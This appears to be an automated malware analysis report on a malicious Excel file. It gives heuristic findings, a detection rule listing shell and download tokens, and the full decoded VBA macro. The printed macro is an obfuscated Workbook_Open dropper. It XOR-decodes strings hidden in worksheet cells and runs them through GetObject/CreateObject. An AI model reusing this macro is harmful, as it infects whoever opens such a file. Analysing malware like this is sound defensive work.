MALICIOUS
148
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
This Excel file contains VBA macros, including a Workbook_Open event, which are designed to execute code. The heuristics indicate the use of CreateObject and GetObject, suggesting the creation or manipulation of objects to run malicious code. The macro's AlphAbeticAl subroutine calls Towns.Run, which likely executes a second-stage payload. The obfuscated nature of the script prevents a more detailed analysis of the payload's exact function.
Heuristics 5
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set Towns = GetObject(Athletics).CreateObject(Horizontal) -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set Towns = GetObject(Athletics).CreateObject(Horizontal) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Sub Workbook_Open()
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4378 bytes |
SHA-256: 9441b863e94d632df9854b80400ef07e1b4214516e12130c4afd4054be60b2a1 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Private Towns As Object
Private Sub SuperviSion(ByVal Athletics As String, ByVal Climbing As String, ByVal Horizontal As String, ByVal Loves As String)
Coding Athletics, Horizontal
AlphAbeticAl Towns, Loves, Climbing
End Sub
Sub AlphAbeticAl(ByVal Towns As Object, ByVal Loves As String, ByVal Climbing As String)
Towns.Run Climbing, 0
End Sub
Private Function Mozilla(ByVal Loving As String) As Variant
Dim CorreCtion As Long: CorreCtion = 0: Dim Pointed() As Byte
Dim ArtificiAl() As Byte, ConneCtor As String, Selecting As Integer, TiTTen As Integer, Permits As Integer
ArtificiAl = "ub385e8cd2"
GoTo BaBies
Northeast:
If CorreCtion < UBound(Pointed) Then
Selecting = CorreCtion Mod (10)
Permits = ArtificiAl(Selecting * 2)
TiTTen = Pointed(CorreCtion)
GoTo Rapidly
SiSterS:
ConneCtor = ConneCtor & Chr(Pointed(CorreCtion))
CorreCtion = CorreCtion + 1
GoTo Northeast
Else
GoTo Genuine
End If
Genuine:
Mozilla = ConneCtor
Exit Function
BaBies:
Pointed = Verified(Loving)
GoTo Northeast
Rapidly:
Pointed(CorreCtion) = Abs(TiTTen Xor Permits)
GoTo SiSterS
End Function
Sub Coding(ByVal Athletics As String, ByVal Horizontal As String)
Set Towns = GetObject(Athletics).CreateObject(Horizontal)
End Sub
Sub Workbook_Open()
SuperviSion Mozilla(Sheets("t66de").Range("J118").Value), Mozilla(Sheets("t66de").Range("H102").Value), Mozilla(Sheets("t66de").Range("H163").Value), Mozilla(Sheets("t66de").Range("F159").Value)
End Sub
Private Function Verified(ByVal Answered As String) As Variant
Dim ConneCtor() As Byte, i As Long, Selecting As Integer, Crowd As Integer
Crowd = Len(Answered) / 2: i = 0: ReDim ConneCtor(0 To Crowd) As Byte
Permits:
If i < Len(Answered) Then
Selecting = Selecting + 1
ConneCtor(Selecting - 1) = Chr((20 - 6) + (((8 - 2) * 2) * 2)) & Chr((((32 / 4) * 2) + (4 * 5)) * 2) & Mid(Answered, i + 1, 2)
i = i + 2
GoTo Permits
Else
GoTo Kennedy
Dim Rapidly As String
Rapidly = InputBox("celp lape")
End If
Kennedy:
Verified = ConneCtor
End Function
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.